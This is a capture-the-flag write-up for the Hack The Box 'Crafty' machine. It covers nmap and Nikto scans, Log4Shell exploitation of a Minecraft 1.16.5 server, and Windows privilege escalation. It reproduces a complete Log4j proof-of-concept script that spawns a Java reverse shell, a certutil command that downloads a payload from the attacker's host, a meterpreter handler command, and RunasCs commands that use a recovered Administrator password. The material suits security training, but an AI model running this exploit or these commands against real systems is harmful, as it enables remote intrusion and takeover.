HTB CRAFTY WRITEUP
Crafty is an easy machine form the HTB community.
Its a windows based box and we have to root it.
Lets Start with the nmap scan.
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
| vulners:
| Minecraft 1.16.5:
| PRION:CVE-2023-33245 6.8 https://vulners.com/prion/PRION:CVE-2023-33245
|_ CVE-2023-33245 6.8 https://vulners.com/cve/CVE-2023-33245
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsGot the MineCraft vulnerable version 1.16.5 associated.
Nikto Scan Show Multiple XSS vulnerabilities.
<==== NIKTO SCAN ====>
Performing Nikto scan...
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.249
+ Target Hostname: 10.10.11.249
+ Target Port: 80
+ Start Time: 2024-03-13 06:32:52 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://crafty.htb
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1724
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ /members.asp?SF=%22;}alert(223344);function%20x()\{v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). See: OSVDB-4598
+ /forum_members.asp?find=%22;}alert(9823);function%20x()\{v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). See: OSVDB-2946
+ 8075 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-03-13 07:11:27 (GMT-4) (2315 seconds)Got an Explot for Log4j.
Following the POC now.
Install TLauncher for running Minecraft client
https://github.com/kozmer/log4j-shell-poc
Main Exploit that can be used to exploit MineCraft using Log4j vulnerability
#!/usr/bin/env python3
import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
CUR_FOLDER = Path(__file__).parent.resolve()
def generate_payload(userip: str, lport: int) -> None:
program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
# writing the exploit to Exploit.java file
p = Path("Exploit.java")
try:
p.write_text(program)
subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
except OSError as e:
print(Fore.RED + f'[-] Something went wrong {e}')
raise e
else:
print(Fore.GREEN + '[+] Exploit java class created success')
def payload(userip: str, webport: int, lport: int) -> None:
generate_payload(userip, lport)
print(Fore.GREEN + '[+] Setting up LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=ldap_server, args=(userip, webport))
t1.start()
# start the web server
print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
httpd.serve_forever()
def check_java() -> bool:
exit_code = subprocess.call([
os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),
'-version',
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
return exit_code == 0
def ldap_server(userip: str, lport: int) -> None:
sendme = "${jndi:ldap://%s:1389/a}" % (userip)
print(Fore.GREEN + f"[+] Send me: {sendme}\n")
url = "http://{}:{}/#Exploit".format(userip, lport)
subprocess.run([
os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),
"-cp",
os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
"marshalsec.jndi.LDAPRefServer",
url,
])
def main() -> None:
init(autoreset=True)
print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")
parser = argparse.ArgumentParser(description='log4shell PoC')
parser.add_argument('--userip',
metavar='userip',
type=str,
default='localhost',
help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport',
metavar='webport',
type=int,
default='8000',
help='listener port for HTTP port')
parser.add_argument('--lport',
metavar='lport',
type=int,
default='9001',
help='Netcat Port')
args = parser.parse_args()
try:
if not check_java():
print(Fore.RED + '[-] Java is not installed inside the repository')
raise SystemExit(1)
payload(args.userip, args.webport, args.lport)
except KeyboardInterrupt:
print(Fore.RED + "user interrupted the program.")
raise SystemExit(0)
if __name__ == "__main__":
main()- Importing Libraries: The script imports necessary libraries such as
argparse,colorama,subprocess,threading,Path,os, andhttp.server. - Defining Constants: It sets a constant variable
CUR_FOLDERto the parent directory of the script. - Generating Payload: The function
generate_payloaddynamically generates a Java class (Exploit.java) containing code to exploit the Log4j vulnerability. It then compiles the Java code using the Java Development Kit (javac). - Setting Up Payload: The
payloadfunction initiates the payload generation, sets up an LDAP server on a separate thread usingldap_serverfunction, and starts a web server to serve the exploit payload. - Checking Java Installation: The
check_javafunction verifies whether Java is installed on the system by attempting to run it and checking the exit code. - Starting LDAP Server: The
ldap_serverfunction sets up an LDAP server that responds with a crafted LDAP reference containing the user's IP and a port number. - Main Function: The
mainfunction initializes the program, parses command-line arguments (user IP, web port, and listener port), checks for Java installation, and starts the payload generation and server setup. - Execution: Finally, the script executes the
mainfunction if it is directly run as the main script.
POV from Software Sinner
So exploring it more what it do use
What is the Log4j exploit?
Log4j didn’t get much attention until December 2021, when a series of critical vulnerabilities were publicly disclosed.
The Log4j exploit began as a single vulnerability, but it became a series of issues involving Log4j and the Java Naming and Directory Interface (JNDI) interface, which is the root cause of the exploit.
What is JNDI ?
JNDI stands for Java Naming and Directory Interface. It is a Java API that provides a unified interface to multiple naming and directory services, such as DNS, LDAP, NIS, and RMI. JNDI allows Java applications to access and manipulate objects in these naming and directory services in a uniform manner, regardless of the underlying service’s implementation.
Ok so Now we have a good grip on the working of exploit now.
Moving towards exploitation
EXPLOITATION
Change the exploit a bit to work it for Windows system in POC we have cmd=/bin/bash but we want cmd.exe replacing it.
Download jdk specific version jdk-8u20-linux-x64 in the same folder where poc.py is.
sudo python3 poc.py --userip <your attack ip here> --webport 80 --lport 4444
copy send me press T in Minecraft to open text box and then paste this payload there and then hit enter and we got the reverse shell
got the user.txt form here and now moving towards privesc.
I did checked for all privesc vectors but nothing found interesting and i wasnt able to download any file from this shell. so i upgraded it to meterpreter and now going to meterpreter.
certutil -urlcache -f http://your_attack_ip:9009/shell-x64.exe shell-x64.exe
for payload delivery and for listener
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost your_attack_ip; set lport 7988; exploit" and we got our shell
We found a plugin directory in server
Now we got a .jar file in plugins and it seems a snapshot that may help us
Download it and then analyze it
Add now lets analyze it through jadx-gui a java decompilier
Now we got a password a local host and a port
By looking on the class Rcon we got this
From it i interpreted it as a Administrator password and try finding was to go on with further.
Then i came across a tool named RunasCs.exe that can be used to run command as any user we want.
using meterpreter i uploaded RunasCs.exe first.
then uploaded a meterpreter shell.exe
RunasCs.exe Administrator s67u84zKq8IXw "shelll.exe"tried to run it using RunasCs.exe but was not having revershell. After some time i got the shell but with time out error. so i tried to read the flag using RunasCs.exe
First i listed the directory using RunasCs.exe
RunasCs.exe Administrator s67u84zKq8IXw "cmd /c dir C:\Users\Administrator\Desktop"
Read the flag.
RunasCs.exe Administrator s67u84zKq8IXw "cmd /c type C:\Users\Administrator\Desktop\root.txt"And so we rooted this box in this way.
It took 24 hours for me to root this box as the connections to the VM and the server were not stable multiple time i have reset the machine and a lottttttttttttttttttttttttttttttttt of Shellsssssss and Meterpreter. So may be its a issue at my side or its an issue in the BOX that it is requiring connection many times.
It was my first time i have played MineCraft so enjoyed the frustration of rooting this box along with Cozzyy sound of MineCraft at back.
Happy Hacking :)
